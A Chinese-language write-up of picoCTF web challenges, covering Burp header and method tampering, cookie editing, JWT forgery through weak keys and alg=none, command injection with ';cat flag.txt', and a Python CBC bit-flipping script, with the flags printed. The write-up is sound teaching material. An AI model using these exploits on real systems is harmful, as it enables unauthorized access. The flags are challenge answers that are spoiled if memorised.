CTF-Web Exploitation

1. GET aHEAD

Find the flag being held on this server to get ahead of the competition

Hints

Check out tools like Burpsuite to modify your requests and look at the responses

根据提示使用不同的请求方式得到response可能会得到结果

使用抓包工具Burp Suit抓取链接请求信息

修改请求方式POST/GET为HEAD发送请求，获取包含flag的响应信息

The HEAD method asks for a response identical to a GET request, but without the response body.
HEAD 方法请求与 GET 请求相同的响应，但没有响应正文。

Burp Suite 是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
本题中使用 Proxy拦截请求的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截，查看，修改在两个方向上的原始数据流。
Repeater手动操作来补发单独的HTTP 请求，并分析应用程序响应。

2. Cookies

Who doesn’t love cookies? Try to figure out the best one.

通过浏览器devTools工具获取cookie

发现一个value为-1

修改cookie值-1为1刷新页面得到**I love chocolate chip cookies!**

随着value 的值不断更新，返回提示信息也会不断更改，直到value=18

手动修改value值比较麻烦，可以使用python脚本找出value在一定范围内且返回信息包含有I love 字符串的，不包含的打印出来看看结果

import requests
url = "http://mercury.picoctf.net:29649/check"for i in range(0, 20):text = str(i)cookies = { 'name': text}   r = requests.get(url, cookies=cookies)result = r.text.split("<p style=\"text-align:center; font-size:30px;\"><b>")[1].split("</b>")[0]print("[+] Testing Cookie:{} | Result: {}".format(i, result))if 'I love' not in result:print(r.text.split("<code>")[1].split("</code>")[0])break

3. Insp3ct0r

Kishor Balan tipped us off that the following code may need inspection

Hints

How do you inspect web code on a browser?

There's 3 parts

根据提示检查代码，发现注释中有Flag信息，由三部分组成

HTML部分：

<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 -→

CSS部分：

/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */

JS部分：

/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?2e7b23e3} */

组合：picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?2e7b23e3}

4. Scavenger Hunt

There is some interesting information hidden around this site

Hints

You should have enough hints to find the files, don't run a brute forcer.

一些有趣的信息隐藏在网站中

和上一题一样在HTML CSS JS中寻找三部分flag组合

不过在JS中提示/* How can I keep Google from indexing my website? */

robots.txt是网站管理者写给爬虫的一封信，里面描述了网站管理者不希望爬虫做的事

访问robot.tx文件得到

# Part 3: t_0f_pl4c
# I think this is an apache server... can you Access the next flag?

提示还有第四部分，使用apache作为服务器那么换成.htaccess

得到

# Part 4: 3s_2_lO0k
# I love making websites on my Mac, I can Store a lot of information there.

使用mac数据库访问.DS_Store

.DS_Store 是 Desktop Services Store 的缩写，是 macOS 操作系统上的一个不可见文件

Congrats! You completed the scavenger hunt. Part 5: _fa04427c}

组合Flag：picoCTF{th4ts_4_l0t_0f_pl4c3s_2_lO0k_fa04427c}

5. Bookmarklet

Description

Why search for the flag when I can make a bookmarklet to print it for me?

Additional details will be available after launching your challenge instance.

Hints

A bookmarklet is a bookmark that runs JavaScript instead of loading a webpage.

What happens when you click a bookmarklet?

Web browsers have other ways to run JavaScript too.

通过在线运行JS计算得到结果

6. where are the robots

Description

Can you find the robots?

Hints

What part of the website could tell you where the creator doesn't want you to look?

网址后加robots.txt得到一个html，访问这个html得到结果

7. It is my Birthday

Description

I sent out 2 invitations to all of my friends for my birthday! I’ll know if they get stolen because the two invites look similar, and they even have the same md5 hash, but they are slightly different! You wouldn’t believe how long it took me to find a collision. Anyway, see if you’re invited by submitting 2 PDFs to my website.

Hints

Look at the category of this problem.

How may a PHP site check the rules in the description?

上传两个相同md5值的pdf文件得到响应结果

8. logon

Description

The factory is hiding things from all of its users. Can you login as Joe and find what they’ve been looking at?

Hints

Hmm it doesn't seem to check anyone's password, except for Joe's?

提示除了Joe其他用户不验证密码

试试admin直接空密码登录，提示成功不过没有Flag

查看cookie发现admin的值是False，那么把值改成True 刷新得到Flag

9. dont-use-client-side

Description

Can you break into this super secure portal?

Hints

Never trust the client

随便输入密码验证，弹窗提示说明是js验证的

通过查看js看到Flag的片段，重组一下

<script type="text/javascript">function verify() {checkpass = document.getElementById("pass").value;split = 4;if (checkpass.substring(0, split) == 'pico') {if (checkpass.substring(split*6, split*7) == '706c') {if (checkpass.substring(split, split*2) == 'CTF{') {if (checkpass.substring(split*4, split*5) == 'ts_p') {if (checkpass.substring(split*3, split*4) == 'lien') {if (checkpass.substring(split*5, split*6) == 'lz_b') {if (checkpass.substring(split*2, split*3) == 'no_c') {if (checkpass.substring(split*7, split*8) == '5}') {alert("Password Verified")}}}}}}}}else {alert("Incorrect password");}}
</script>
checkpass.substring(0, 4) == 'pico'
checkpass.substring(4, 8) == 'CTF{'
checkpass.substring(8, 12) == 'no_c'
checkpass.substring(12, 16) == 'lien'
checkpass.substring(16, 20) == 'ts_p'
checkpass.substring(20, 24) == 'lz_b'
checkpass.substring(24, 28) == '706c'
checkpass.substring(28, 32) == '5}'

picoCTF{no_clients_plz_b706c5}

10. picobrowser

Description

This website can be rendered only by picobrowser, go and catch the flag!

Hints

You don't need to download a new web browser

点击Flag提示只能用picobrowser访问

修改请求头User-Agent属性为picobrowser，再次请求得到结果

11. Client-side-again

Description

Can you break into this super secure portal?

Hints

What is obfuscation?

又一个js验证密码的，找到js文件，格式化一下得到

< script type = "text/javascript" >var _0x5a46 = ['f49bf}', '_again_e', 'this', 'Password\x20Verified', 'Incorrect\x20password', 'getElementById', 'value', 'substring', 'picoCTF{', 'not_this'];
(function(_0x4bd822, _0x2bd6f7) {var _0xb4bdb3 = function(_0x1d68f6) {while (--_0x1d68f6) {_0x4bd822['push'](_0x4bd822['shift']());}};_0xb4bdb3(++_0x2bd6f7);
}(_0x5a46, 0x1b3));
var _0x4b5b = function(_0x2d8f05, _0x4b81bb) {_0x2d8f05 = _0x2d8f05 - 0x0;var _0x4d74cb = _0x5a46[_0x2d8f05];return _0x4d74cb;
};function verify() {checkpass = document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')];split = 0x4;if (checkpass[_0x4b5b('0x2')](0x0, split * 0x2) == _0x4b5b('0x3')) {if (checkpass[_0x4b5b('0x2')](0x7, 0x9) == '{n') {if (checkpass[_0x4b5b('0x2')](split * 0x2, split * 0x2 * 0x2) == _0x4b5b('0x4')) {if (checkpass[_0x4b5b('0x2')](0x3, 0x6) == 'oCT') {if (checkpass[_0x4b5b('0x2')](split * 0x3 * 0x2, split * 0x4 * 0x2) == _0x4b5b('0x5')) {if (checkpass['substring'](0x6, 0xb) == 'F{not') {if (checkpass[_0x4b5b('0x2')](split * 0x2 * 0x2, split * 0x3 * 0x2) == _0x4b5b('0x6')) {if (checkpass[_0x4b5b('0x2')](0xc, 0x10) == _0x4b5b('0x7')) {alert(_0x4b5b('0x8'));}}}}}}}} else {alert(_0x4b5b('0x9'));}
} <
/script>picoCTF{not_this_again_ef49bf}

根据数组里的信息提取得到picoCTF{not_this_again_ef49bf}

12. Java Code Analysis!?!

Description

BookShelf Pico, my premium online book-reading service.I believe that my website is super secure. I challenge you to prove me wrong by reading the ‘Flag’ book!

Hints

Maybe try to find the JWT Signing Key ("secret key") in the source code? Maybe it's hardcoded somewhere? Or maybe try to crack it?

The 'role' and 'userId' fields in the JWT can be of interest to you!

The 'controllers', 'services' and 'security' java packages in the given source code might need your attention. We've provided a [README.md](http://readme.md/) file that contains some documentation.

Upgrade your 'role' with the *new* (cracked) JWT. And re-login for the new role to get reflected in browser's localStorage.

根据提示看JWT相关代码，发现密钥是固定的1234 这样签名后的结果是不变的

修改签名信息，让user拥有admin权限

使用UserContorller里的接口以及useradmin权限给用户分配admin角色

通过查看代码发现指定角色接口需要两个参数，userId和roleName

通过jwt官网得到解密后的信息

拿到信息后修改role为Admin 继续签名得到结果拿去查询用户信息

查询到我新建的用户id为6

使用userAdmin签名给我的用户分配角色Admin

成功后登录可以查看admin权限的Flag

13. Who are you

Description

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:46199/

Hints

It ain't much, but it's an RFC [https://tools.ietf.org/html/rfc2616](https://tools.ietf.org/html/rfc2616)

通过修改请求Header参数满足需求，使用Burp suit修改Header

14. Login

Description

My dog-sitter’s brother made this website but I can’t get in; can you help?

随便输入用户名密码发现是JS弹窗验证

查看JS验证代码

(async()=>{await new Promise((e=>window.addEventListener("load", e))),document.querySelector("form").addEventListener("submit", (e=>{e.preventDefault();const r = {u: "input[name=username]",p: "input[name=password]"}, t = {};for (const e in r)t[e] = btoa(document.querySelector(r[e]).value).replace(/=/g, "");return "YWRtaW4" !== t.u ? alert("Incorrect Username") : "cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ" !== t.p ? alert("Incorrect Password") : void alert(`Correct Password! Your flag is ${atob(t.p)}.`)}))
}
)();

发现btoa()函数

该WindowOrWorkerGlobalScope.btoa()方法从String对象创建一个base-64编码的ASCII字符串，其中字符串中的每个字符都被视为二进制数据的字节

base-64在线解码一下，得到密码Flag

15. JaWT Scratchpad

Description

Check the admin scratchpad!

Hints

What is that cookie?

Have you heard of JWT?

根据提示使用John登录拿到cookie中的jwt token

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiSm9obiJ9.K1Omo0Gk5saKwJTkkgT7PUZohD7USknEE0lmT2AYAiM

使用hashcat弱密钥暴力破解密钥为ilovepico

使用密钥修改用户为admin 将生成的新token修改到cookie中刷新得到结果

16. Some Assembly Required 1

有限的信息可以看到Assembly是主角

使用浏览器devtools直接看源码，发现wasm中可以直接看到flag

17. More Cookies

Description

I forgot Cookies can Be modified Client-side, so now I decided to encrypt them!

Hints

https://en.wikipedia.org/wiki/Homomorphic_encryption

The search endpoint is only helpful for telling you if you are admin or not, you won't be able to guess the flag name

Description

I forgot Cookies can Be modified Client-side, so now I decided to encrypt them!

Description

I forgot Cookies can Be modified Client-side, so now I decided to encrypt them! http://mercury.picoctf.net:34962/

题目是cookies直接看cookie

dTc5MkIzanVzUDVJSysza1lqcHdVVlZTaEc5ZS9ZR2RDWjFWUUlJWFdpZ2VKVkhDYUsxVHJISDdaeXIzVW5UNS93OFJLbmdJaExFamNNcmJ0Zm5maWFXc1RIaVN3UldkSlAwZFlESVBjaVNmR08zOU9EQ0M3OUVTTlpiQ3Nyazc=

关于加密的，使用base64解密试一下

u792B3jusP5IK+3kYjpwUVVShG9e/YGdCZ1VQIIXWigeJVHCaK1TrHH7Zyr3UnT5/w8RKngIhLEjcMrbtfnfiaWsTHiSwRWdJP0dYDIPciSfGO39ODCC79ESNZbCsrk7

题目描述中发现C B C 大写，可能使用了密码块链 （CBC）。CBC 容易受到位翻转的影响。Crypto StackExchange 上的这个答案广泛解释了这种攻击。从本质上讲，有一个位可以确定用户是否是管理员。也许有一个像 admin=0 这样的参数，如果我们更改正确的位，那么我们可以设置 admin=1。但是，这个位的位置是未知的，所以我们可以尝试每个位置，直到我们得到标志。

使用python脚本

import requests
import base64
from tqdm import tqdmADDRESS = "http://mercury.picoctf.net:[34962](http://mercury.picoctf.net:34962/)/"s = requests.Session()
s.get(ADDRESS)
cookie = s.cookies["auth_name"]
# Decode the cookie from base64 twice to reverse the encoding scheme.
decoded_cookie = base64.b64decode(cookie)
raw_cookie = base64.b64decode(decoded_cookie)def exploit():# Loop over all the bytes in the cookie.for position_idx in tqdm(range(0, len(raw_cookie))):# Loop over all the bits in the current byte at `position_idx`.for bit_idx in range(0, 8):# Construct the current guess.# - All bytes before the current `position_idx` are left alone.# - The byte in the `position_idx` has the bit at position `bit_idx` flipped.#   This is done by XORing the byte with another byte where all bits are zero#   except for the bit in position `bit_idx`. The code `1 << bit_idx`#   creates a byte by shifting the bit `1` to the left `bit_idx` times. Thus,#   the XOR operation will flip the bit in position `bit_idx`.# - All bytes after the current `position_idx` are left alone.bitflip_guess = (raw_cookie[0:position_idx]+ ((raw_cookie[position_idx] ^ (1 << bit_idx)).to_bytes(1, "big"))+ raw_cookie[position_idx + 1 :])# Double base64 encode the bit-blipped cookie following the encoding scheme.guess = base64.b64encode(base64.b64encode(bitflip_guess)).decode()# Send a request with the cookie to the application and scan for the# beginning of the flag.r = requests.get(ADDRESS, cookies={"auth_name": guess})if "picoCTF{" in r.text:print(f"Admin bit found in byte {position_idx} bit {bit_idx}.")# The flag is between `<code>` and `</code>`.print("Flag: " + r.text.split("<code>")[1].split("</code>")[0])returnexploit()

18. caas

Description

Now presenting cowsay as a service

从下载的js文件看到使用了exec()函数执行，可能存在执行权限问题

按提示url加上message信息加;ls 结果输出目录，说明可执行

继续加上;cat flag.txt 得到flag

19. Some Assembly Required 2

直接查看devTools wasm，得到xor密文

使用在线解密工具得到结果

20. SQL Direct

Description

Connect to this PostgreSQL server and find the flag!

Additional details will be available after launching your challenge instance.

Hints

What does a SQL database contain?

登录PostgreSQL 查询数据库，得到flag

21. JAuth

Description

Most web application developers use third party components without testing their security. Some of the past affected companies are:

• Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
• Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
• VerticalScope (internet media company) - outdated version of vBulletin forum software used

Can you identify the components and exploit the vulnerable one?

Hints

Use the web browser tools to check out the JWT cookie.

The JWT should always have two (2) . separators.

Description

Most web application developers use third party components without testing their security. Some of the past affected companies are:

• Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
• Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
• VerticalScope (internet media company) - outdated version of vBulletin forum software used

Can you identify the components and exploit the vulnerable one?

Additional details will be available after launching your challenge instance.

登录user用户得到tocken，解签得到payload信息

利用这个jwt漏洞测试web token

首先关闭安全性，将“alg”设置为“none”，然后将角色设置为“admin”，然后省略末尾的签名，但保留尾随句点。

将cookie中的值修改为新的token，刷新得到Flag